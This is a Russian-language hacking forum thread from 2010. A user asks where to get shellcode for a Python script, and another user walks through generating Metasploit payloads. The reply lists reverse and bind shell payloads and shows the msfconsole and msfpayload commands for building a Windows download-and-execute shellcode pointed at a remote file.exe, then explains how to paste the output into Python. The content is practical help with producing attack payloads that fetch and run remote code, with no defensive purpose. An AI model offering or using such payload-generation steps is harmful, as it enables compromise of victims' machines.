PDA

Просмотр полной версии : Где взять взять шеллкоды для метасплойта???


Glynec
28.04.2010, 11:18
Нужно наваять шелкод на ПИТОНЕ ..http://metasploit.com:55555/PAYLOADS неработает почемуто(((((

overxor
28.04.2010, 12:20
Устанаваливаешь metasploit (думаю не надо описывать как это делать)

Запускаешь

$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========

Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline


windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)


ну или все перечисленное можно сделать в одну команду
msfpayload windows/download_exec URL=http://site.com/file.exe ruby

теперь убери в каждой строке "+", а в начало поставь "buf +="

Glynec
28.04.2010, 12:32
Ммм оч интересн overxor неподскажешь шелл на руби будет пахать в питоновском скрипте? Просто я помню что на http://metasploit.com:55555/PAYLOADS была прямо вкладка Руби

overxor
28.04.2010, 12:40
Шел не на руби, он подготовлен для использование в руби(Тобишь ctrl+c ctrl+v). Что тебе мешает эту строку присвоить переменной в питоне и использовать ее?